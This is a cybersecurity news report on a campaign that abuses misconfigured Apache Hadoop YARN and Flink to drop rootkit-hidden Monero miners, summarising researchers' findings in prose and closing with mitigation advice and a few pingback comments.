Cybersecurity researchers have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners in targeted environments.
“This attack is of particular interest due to the attackers’ use of packers and rootkits to hide the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes the contents of specific directories and modifies system configurations to evade detection.”
The infection chain for Hadoop exploits a misconfiguration in the YARN ResourceManager, another resource negotiator, which is responsible for tracking resources in the cluster and scheduling applications.
Specifically, an unauthenticated remote threat actor can exploit misconfiguration to execute arbitrary code via crafted HTTP requests, depending on the user permissions on the node where the code is executed.
Likewise, attacks against Apache Flink target misconfigurations that allow remote attackers to execute code without any authentication.
These misconfigurations are not new and have been exploited in the past by financially motivated groups such as TeamTNT, which is known for its targeting of Docker and Kubernetes environments for cryptojacking and other malicious activities.
But the latest set of attacks is notable for using rootkits to hide the cryptocurrency mining process after gaining an initial foothold in Hadoop and Flink applications.
“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to YARN, requesting that the new application be launched using the attacker’s command. . ”
This command is specifically used to clear all existing contents of the /tmp directory, get a file named “dca” from the remote server and execute it, and then delete all files in the /tmp directory again.
The executed payload is a packed ELF binary that acts as a downloader to retrieve both rootkit and Monero cryptocurrency miner binaries. It is worth pointing out that various adversaries, including Kinsing, have resorted to using rootkits to hide the existence of the mining process.
For persistence, a cron job is created to download and execute the shell script that deploys the “dca” binary. Further analysis of the threat actor’s infrastructure revealed that the temporary server used to obtain the downloader was registered on October 31, 2023.
As a mitigation measure, it is recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, and other suspicious runtime behavior.
3 Comments
Pingback: Crypto miners exploit rootkits to target misconfigured Apache Hadoop and Flink in new attack – Tech Empire Solutions
Pingback: Crypto miners exploit rootkits to target misconfigured Apache Hadoop and Flink in new attack – Mary Ashley
Pingback: Crypto miners exploit rootkits to target misconfigured Apache Hadoop and Flink in new attack – Paxton Willson